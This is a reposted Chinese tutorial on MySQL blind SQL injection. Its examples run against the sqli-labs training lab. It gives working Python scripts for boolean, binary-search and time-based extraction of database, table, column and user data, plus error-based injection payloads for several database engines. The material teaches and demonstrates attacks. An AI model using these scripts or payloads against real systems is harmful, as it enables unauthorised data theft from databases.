2. 程式人生 > >【SQL注入技巧拓展】————5、MySQL盲注淺析

【SQL注入技巧拓展】————5、MySQL盲注淺析

阿新 發佈:2018-12-23

前言

所有的測試均為無WAF的情況下進行。

註釋關鍵字

--       # 單行註釋,兩個-連線符後面緊跟著一個空格
#	 # 單行註釋
/**/     # 多行註釋

實踐效果:

mysql> SELECT username,password FROM `users` WHERE id = '2'#' LIMIT 0,1;
    -> ;
+----------+------------+
| username | password   |
+----------+------------+
| Angelina | I-kill-you |
+----------+------------+
1 row in set

mysql> SELECT username,password FROM `users` WHERE id = '2'-- ' LIMIT 0,1;
    -> ;
+----------+------------+
| username | password   |
+----------+------------+
| Angelina | I-kill-you |
+----------+------------+
1 row in set

都是可以正常得到查詢的結果
說明後面的SQL語句已經被我們註釋掉了

Sql注入擷取字串常用函式

在不回顯的情況下,多數情況下都會用到擷取字串的問題,也就是在盲注的情況下,需要一個一個字元的去猜解,其中就需要擷取字串。

mid()函式

語法為:

SELECT MID(column_name,start[,length]) FROM table_name;

  • column_name 必需。要提取字元的欄位。
  • start 必需。規定開始位置(起始值是 1)。
  • length可選。要返回的字元數。如果省略,則 MID() 函式返回剩餘文字。

我們就直接使用sqli-labs的資料庫進行演示。

database()為security 
mysql> select mid(database(),1,4);
+---------------------+
| mid(database(),1,4) |
+---------------------+
| secu                |
+---------------------+
1 row in set

其中column_name內容可為自行構造的sql語句。

substr()函式

語法為:

SELECT SUBSTR(column_name,start[,length]) FROM table_name;

描述和用法與mid()函式是一樣的

mysql> select substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1);
+--------------------------------------------------------------------------------------------------------+
| substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1) |
+--------------------------------------------------------------------------------------------------------+
| e                                                                                                      |
+--------------------------------------------------------------------------------------------------------+
1 row in set

Left()函式

語法為:

SELECT LEFT(ARG,LENGTH) FROM table_name;

取一個字串的前若干位

mysql> select left(database(),4);
+--------------------+
| left(database(),4) |
+--------------------+
| secu               |
+--------------------+
1 row in set

布林SQL盲注

用sqli-labs的第6題作為例子

先手工fuzz一下。

http://192.168.2.100/sqli-labs/Less-6/?id=-1
http://192.168.2.100/sqli-labs/Less-6/?id=1'
http://192.168.2.100/sqli-labs/Less-6/?id=1"

"報錯,繼續fuzz

http://192.168.2.100/sqli-labs/Less-6/?id=1"and"1"="1
http://192.168.2.100/sqli-labs/Less-6/?id=1"and"1"="2

存在注入,但是沒有回顯,判斷為可盲注。
測試一下(其實盲注的指令碼真的就只是這幾行,難度無非是在waf過濾函式的替換繞過)。

# ! usr/bin/env python
#  -*- coding: utf-8 -*-
import requests

url = 'http://192.168.2.100/sqli-labs/Less-6/?id=1"'
print("獲取資料庫長度")
for i in range(1, 32):
    payload = "and length(database())=%d--+" % i
    res = requests.get(url + payload)
    if "You are in..........." in res.text:
        print("[+]資料庫長度為:" + str(i) + "位")
        break
結果為
/usr/bin/python2.7 /home/rcoil/PycharmProjects/demo/demo.py
獲取資料庫長度
[+]資料庫長度為:8位

Process finished with exit code 0

所以證明注入確實存在且為盲注,瀏覽器驗證下。

獲取資料庫名字

先測試(fuzz)

發現是可行的。然後寫指令碼進行猜解。

# ! usr/bin/env python
#  -*- coding: utf-8 -*-
import requests

url = 'http://192.168.2.100/sqli-labs/Less-6/?id=1"'
print("獲取資料庫名字")
database = ''
for i in range(1, 10):
    for j in range(97, 123):
        payload = "and mid(database(),1,%d)='%s'--+" % (i, database + chr(j))
        res = requests.get(url + payload)
        if "You are in..........." in res.text:
            database += chr(j)
            print("[-]當前猜解:" +database)
            break
print("[+]當前資料庫:" +database)

如果出現編碼問題,要注意的是headersContent-Type的值,必要的時候帶入headers進行訪問

獲取表名

mysql> select mid((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,2);
+-----------------------------------------------------------------------------------------------------+
| mid((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,2) |
+-----------------------------------------------------------------------------------------------------+
| em                                                                                                  |
+-----------------------------------------------------------------------------------------------------+
1 row in set

所以接下來程式碼為

# ! usr/bin/env python
#  -*- coding: utf-8 -*-
import requests

url = 'http://192.168.2.100/sqli-labs/Less-6/?id=1"'
table_names = ''
for i in range(0, 8):
    for k in range(1, 32):
        for j in range(97, 123):
            payload = "and mid((select table_name from information_schema.tables where table_schema='security' limit %d,1),1,%d)='%s'--+" % (i, k, table_names+chr(j))
            request = requests.get(url + payload)
            if "You are in" in request.text:
                table_names += chr(j)
                print("第" + str(i + 1) + "張表的名字為" + table_names)
                break

我發現,如果想要優雅一些,用ascii()或者改變k的位置
比如

and ascii(mid((select table_name from information_schema.tables where table_schema='security' limit %d,1),%d,1))='%d'--+" % (i, k, j)

但是這樣子的話,到最後,所有的table_names都拼接一起(後面補充)。

獲取列名

mysql> select mid((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 1,1),1,4);
+------------------------------------------------------------------------------------------------------------------------------+
| mid((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 1,1),1,4) |
+------------------------------------------------------------------------------------------------------------------------------+
| user                                                                                                                         |
+------------------------------------------------------------------------------------------------------------------------------+
1 row in set

程式碼和上面的沒區別

# ! usr/bin/env python
#  -*- coding: utf-8 -*-
import requests

url = 'http://192.168.2.100/sqli-labs/Less-6/?id=1"'
column_names = ''
for i in range(0, 8):
    for k in range(1, 32):
        for j in range(97, 123):
            payload = "and ascii(mid((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit %d,1),%d,1))='%d'--+" % (i, k, j)
            request = requests.get(url + payload)
            if "You are in" in request.text:
                column_names += chr(j)
                print("第" + str(i + 1) + "列欄位名為" + column_names)
                break

爆欄位

# ! usr/bin/env python
#  -*- coding: utf-8 -*-
import requests

url = 'http://192.168.2.100/sqli-labs/Less-6/?id=1"'
column_names = ''
for i in range(0, 8):
    for k in range(1, 32):
        for j in range(21, 127):
            payload = "and ascii(mid((select username from security.users limit %d,1),%d,1))='%d'--+" % (i, k, j)
            request = requests.get(url + payload)
            if "You are in" in request.text:
                column_names += chr(j)
                print("第" + str(i + 1) + "行資料為" + column_names)
                break

這個布林SQL盲注暫時分析到這裡。如果想要一指令碼搞定以上所有的內容,那就def一下就很方便呼叫了。
寫到這裡的時候,我發現,所有的指令碼都有很多的相同點,只需要更換變數就可以直接使用。而且,在去翻資料的過程中,我發現在bool盲注中二分法比窮舉要快一些,所以我參照王一航的思路進行改寫。

#!/usr/bin/env python
# encoding:utf8
import requests
import sys

url = "http://192.168.2.100/sqli-labs/Less-6/?id="

# 定義payload
def exce(database_name, table_name, column_name, Result, Char, mid):
    global url
    esndStr = " and\"1\"=\"1"
    payload = "1\"and(ascii(mid((select " + column_name + " from " + database_name + "." + table_name + "  limit " + Result + ",1)," + Char + ",1))>" + mid + ")"
    tempurl = url + payload + esndStr
    request = requests.get(tempurl).text
    if "You are in..........." in request:
        return True
    else:
        return False

# 二分查詢
def doubleSearch(database_name, table_name, column_name, Result, Char, left_number, right_number):
    while left_number < right_number:
        mid = int((left_number + right_number) / 2)
        if exce(database_name, table_name, column_name, str(Result),str(Char + 1),str(mid)):
            left_number = mid
        else:
            right_number = mid
        if right_number-left_number == 1:
            if exce(database_name, table_name, column_name, str(Result),str(Char + 1),str(mid)):
                mid += 1
                break
            else:
                break
    return chr(mid)

# 定義所有變數初始
def getAllData(database_name, table_name, column_name):
    for i in range(32):
        counter = 0
        for j in range(32):
            counter += 1
            temp = doubleSearch(database_name, table_name, column_name, i, j, 0, 127) # 從255開始查詢
            if ord(temp) == 1:
                break

            sys.stdout.write(temp)
            sys.stdout.flush()
        if counter == 1: 
            break
        sys.stdout.write("\r\n")
        sys.stdout.flush()

def getAllSchemaNames():
    return getAllData(column_name="schema_name", table_name="schemata", database_name="information_schema")
getAllSchemaNames()

大致思想:
1、mid為left和right的中間值,mid是否和left相等(right-left=1),相等跳到5,如果不等跳到2
2、請求mid,如果返回正確的頁面跳到3,如果返回錯誤的頁面跳到4
3、返回頁面正確,將left賦值為mid
4、返回頁面錯誤,將right賦值為mid
5、返回mid值

二分法它的原理是把可能出現的字元看做一個有序的序列,這樣在查詢所要查詢的元素時,首先與序列中間的元素進行比較,如果大於這個元素,就在當前序列的後半部分繼續查詢,如果小於這個元素,就在當前序列的前半部分繼續查詢,直到找到相同的元素,或者所查詢的序列範圍為空為止。

如果需要查詢資料表和資料表的內容,在getAllSchemaNames()添加個where語句

時間的SQL盲注

延時注入是主要針對頁面無變化、無法用布林真假判斷、無法報錯的情況下的注入技術。

延遲注入主要點是在於if()函式的判斷、

if(condition,true,false) //條件語句

  • condition 是判斷條件
  • true 和false 是符合condition自定義的返回結果。

本地測試感受一下

mysql> select ascii(mid(database(),1,1));
+----------------------------+
| ascii(mid(database(),1,1)) |
+----------------------------+
| 115 |
+----------------------------+
1 row in set (0.00 sec)

mysql> select if(ascii(mid(database(),1,1))=115,sleep(5),1);
+-----------------------------------------------+
| if(ascii(mid(database(),1,1))=115,sleep(5),1) |
+-----------------------------------------------+
| 0 |
+-----------------------------------------------+
1 row in set (5.01 sec)

mysql> select if(ascii(mid(database(),1,1))=114,sleep(5),1);
+-----------------------------------------------+
| if(ascii(mid(database(),1,1))=114,sleep(5),1) |
+-----------------------------------------------+
| 1 |
+-----------------------------------------------+
1 row in set (0.00 sec)

如果condition判斷為正確,則產生延遲,否則不產生延遲。
至於指令碼,修改下上面的指令碼進行判斷即可。

url = "http://192.168.2.100/sqli-labs/Less-9/?id="
esndStr = " and sleep(3))--+"
payload = "1' and ((ascii(mid((select " + column_name + " from " + database_name + "." + table_name + "  limit " + Result + ",1)," + Char + ",1))>" + mid + ")"
tempurl = url + payload + esndStr
before_time = time.time()
requests.head(tempurl)
after_time = time.time()
use_time = after_time - before_time
if abs(use_time) < 0.1:
    return True
else:
    return False

報錯的SQL盲注

如果頁面上顯示資料的報錯資訊,那麼可以直接使用報錯的方式把想要的資訊爆出來。

比如在mysql中我們可以使用如下的經典語句進行報錯。

select 1,2 union select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x;

這是網上流傳很廣的一個版本,可以簡化成如下的形式。

select count(*) from information_schema.tables group by concat(version(),floor(rand(0)*2))

如果關鍵的表被禁用了,可以使用這種形式

select count(*) from (select 1 union select null union select !1) group by concat(version(),floor(rand(0)*2))

如果rand被禁用了可以使用使用者變數來報錯

select min(@a:=1) from information_schema.tables group by concat(password,@a:=(@a+1)%2)

其實這是mysql的一個bug所引起的,其他資料庫都不會因為這個問題而報錯。

另外,在mysql5.1版本新加入兩個xml函式,也可以用來報錯。

mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,(select pass from admin limit 1)));
ERROR 1105 (HY000): XPATH syntax error: '\admin888'  
mysql> select * from article where id = 1 and 1=(updatexml(1,concat(0x5e24,(select pass from admin limit 1),0x5e24),1));  
ERROR 1105 (HY000): XPATH syntax error: '^$admin888^$'

而在其他資料庫中也可以使用不同的方法構成報錯

PostgreSQL: /?param=1 and(1)=cast(version() as numeric)--
MSSQL: /?param=1 and(1)=convert(int,@@version)--
Sybase: /?param=1 and(1)=convert(int,@@version)--
Oracle >=9.0: /?param=1 and(1)=(select upper(XMLType(chr(60)||chr(58)||chr(58)||(select
replace(banner,chr(32),chr(58)) from sys.v_$version where rownum=1)||chr(62))) from dual)--

 

相關推薦

SQL注入技巧拓展————5MySQL淺析

前言 所有的測試均為無WAF的情況下進行。 註釋關鍵字 -- # 單行註釋,兩個-連線符後面緊跟著一個空格 # # 單行註釋 /**/ # 多行註釋 實踐效果: mysql> SELECT username,password FR

SQL注入技巧拓展————2MySQL注入攻擊與防禦

本文主要是做一個Mysql的注入總結,對於Mysql來說利用的方式太過於靈活,這裡總結了一些主流的一些姿勢。 一、注入常用函式與字元 下面幾點是注入中經常會用到的語句 控制語句操作(select, case, if(), ...) 比較操作(=, like, mod()

SQL注入技巧拓展————4高階SQL注入:混淆和繞過

【0×01】 – 簡介 大家好,這是一篇致力於文件化我們所從事的高階SQL注入技術的文章。 本文將要揭示能用於現實CMSs和WAFs程式中的高階繞過技術和混淆技術。文中所提到的SQL注入語句僅僅是一些繞過保護的方法。還有一些其他的技術能用於攻擊WEB程式,但是很不幸我們不能告訴你,因為它們就是0

SQL注入技巧拓展————3SQL注入防禦與繞過的幾種姿勢

本文章主要以後端PHP和MySQL資料庫為例,參考了多篇文章後的集合性文章。 前言 本文章主要以後端PHP和MySQL資料庫為例,參考了多篇文章後的集合性文章,歡迎大家提出個人見解,互促成長。 一、 PHP幾種防禦姿勢 1. 關閉錯誤提示 說明:PHP配置檔案php.ini

SQL注入技巧拓展————12MongoDB安全 – PHP注入檢測

什麼是MongoDB MongoDB 是一個基於分散式檔案儲存的資料庫。MongoDB是個開源的NoSql資料庫,其通過類似於JSON格式的資料儲存,這使得它的結構就變得非常自由。通過MongoDB的查詢語句就可以查詢具體內容。 為什麼使用MongoDB 其實大部分原因只

SQL注入技巧拓展————11PostgreSQL滲透測試指南

我之所以寫這篇文章,目的在於為滲透測試人員提供測試PostgreSQL資料庫的具體方法。文章中用來演示的目標系統是Metasploitable 2,因為該系統包含許多漏洞,也存在配置不當問題。 一、前言 PostgreSQL是一個開源資料庫,主要部署於Linux作業系統中。然而,Pos

SQL注入技巧拓展————10postgresql資料庫利用方式

PostgreSQL 是一個自由的物件-關係資料庫伺服器(資料庫管理系統),本文對於postgresql的使用及利用做個總結備份。 測試系統:kali 基本使用 在root許可權下修改資料庫密碼: service postgresql start #啟動服務 su po

SQL注入技巧拓展————16繞過WAF注入

正文開始: 找到一個有裝有安全狗的站: 繞過攔截and 1=1: payload:    id=1/*!and*/1=/*!1*/     即可繞過。 通常order by 不會被攔截,攔截了繞過道理差不

XSS技巧拓展————5跨站的藝術-XSS入門與介紹

什麼是XSS? XSS全稱跨站指令碼(Cross Site Scripting),為不和層疊樣式表(Cascading Style Sheets, CSS)的縮寫混淆,故縮寫為XSS,比較合適的方式應該叫做跨站指令碼攻擊。 跨站指令碼攻擊是一種常見的web安全漏洞,它主要是指攻擊者可以在頁面

XXE技巧拓展————3XML實體注入漏洞攻與防

目錄 XML基礎 XML實體注入漏洞的幾種姿勢 防禦XML實體注入漏洞 XML基礎 XML是一種用於標記電子檔案使其具有結構性的標記語言,用於標記電子檔案使其具有結構性的標記語言,可以用來標記資料、定義資料型別,是一種允許使用者對自己的標記語言進行定義的源語言。XM

XSS技巧拓展————4淺談跨站指令碼攻擊與防禦

跨站指令碼簡稱xss(cross-site scripting),利用方式主要是藉助網站本身設計不嚴謹,導致執行使用者提交的惡意js指令碼,對網站自身造成危害。xss漏洞是web滲透測試中最常見而又使用最靈活的一個漏洞,近期在拜讀了《白帽子講web安全》、《Web實戰篇》、《XSS跨站指令碼

XSS技巧拓展————3跨域方法總結

最近面試問的挺多的一個問題,就是JavaScript的跨域問題。在這裡,對跨域的一些方法做個總結。由於瀏覽器的同源策略,不同域名、不同埠、不同協議都會構成跨域;但在實際的業務中,很多場景需要進行跨域傳遞資訊,這樣就催生出多種跨域方法。 具備src的標籤 原理:所有具有src屬性的HTM

XSS技巧拓展————2再談同源策略

同源策略應該是學習 Web 安全時最最基礎的內容,時隔多年再回過頭來仔細溫習一下,發現了不少當初漏掉的細節,結合這麼多年的安全經驗,重新總結一下同源策略相關的內容。 0x00 何為同源策略 如果兩個頁面擁有相同的協議(http、https)、相同的埠(如果其中一個指定了埠)、相同的 h

XSS技巧拓展————1漫談同源策略

摘要 如今的WEB標準紛繁複雜,在瀏覽稍大一些的網站時,細心的人會發現網頁上呈現的內容並不僅限於網站自身提供的內容,而是來自一堆五花八門的網站的內容的集合。但有誰會想到同源策略在保護著網民們的安全呢? 瞭解同源策略是十分有必要的,要深入掌握XSS / CSRF等WEB安全漏洞,不瞭解同源策略

SQL Server學習筆記事務鎖定阻塞死鎖

body sqlserve distrib reset reads cli ast function pre http://blog.csdn.net/sqlserverdiscovery/article/details/7712068 Column nameData

呼叫中心KPI解析5系統撥出呼通量

指標含義 座席主動向客戶發起外呼且成功振鈴的電話量。 設定目的 在系統層面考查客服中心外呼話務的成功量。 計算方法 計算統計時段內客服中心主動向客戶發起外呼且成功振鈴的電話

SQL Server學習筆記5:使用INSERT語句插入資料

使用SQL語句的意義是,要開發的DBAS應用程式不能像人一樣通過SSMS工具來操作資料,SQL語句是應用程式和資料庫通訊的橋樑。而且相比手動圖形化操作,SQL語句更加方便和強大。 SQL(結構化查詢語言)的組成 ①DML(資料操作語言) 插入、刪除和修

RabbitMQ5RabbitMQ任務分發機制

它的 rtu 忘記 順序 sin spa 機制 一段時間 cto 當有Consumer需要大量的運算時,RabbitMQ Server需要一定的分發機制來balance每個Consumer的load。接下來我們分布講解。 應用場景就是RabbitMQ Server會

Sql Server函數日期時間函數日期查詢今天昨天7天內30天的數據

本周 varchar last 類型 nth weight 所有 convert ted 今天的所有數據:select * from 表名 where DateDiff(dd,datetime類型字段,getdate())=0 昨天的所有數據:select * from

劍指offer - C++/Java5用兩個棧實現佇列

牛客網題目連結:用兩個棧實現佇列 題目描述: 用兩個棧來實現一個佇列,完成佇列的Push和Pop操作。 佇列中的元素為int型別。 1、題目分析 首先我們知道資料結構中棧與佇列的特性是: 棧:資料先進後出 佇列:資料先進先出 假設現在佇列的兩個